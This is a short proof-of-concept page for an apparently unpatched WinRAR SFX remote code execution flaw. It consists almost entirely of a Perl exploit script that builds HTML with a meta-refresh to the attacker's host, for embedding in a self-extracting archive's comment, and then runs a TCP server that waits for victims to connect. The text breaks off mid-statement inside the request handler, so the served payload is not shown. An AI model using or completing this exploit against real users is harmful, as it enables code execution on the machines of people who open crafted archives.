Unpatched, exploitable
PoC: Exploit Code

```perl
#!/usr/bin/perl
# Title : WinRaR SFX – Remote Code Execution
# Tested on Windows 7 / Server 2008 / Server 2003
#
# l0s4r.com
use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

print " Mohammad Reza Espargham\n\n";

my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
my $port = 80;

print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n" if($port==80);
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . '"></head></html>'."\n\n" if($port!=80);

my $server = new IO::Socket::INET(
    Proto => 'tcp',
    LocalPort => $port,
    Listen => SOMAXCONN,
    ReuseAddr => 1)
  or die "Unable to create server socket";

# Server loop
while(my $client = $server->accept()) {
    my $client_info;
    while(<$client>) {
        last if /^\r\n$/;
        $client_info .= $_;
    }
    incoming($client, $client_info);
}

sub incoming {
    print "\n=== Incoming Request:\n";
    my $client = shift;
    print $c
```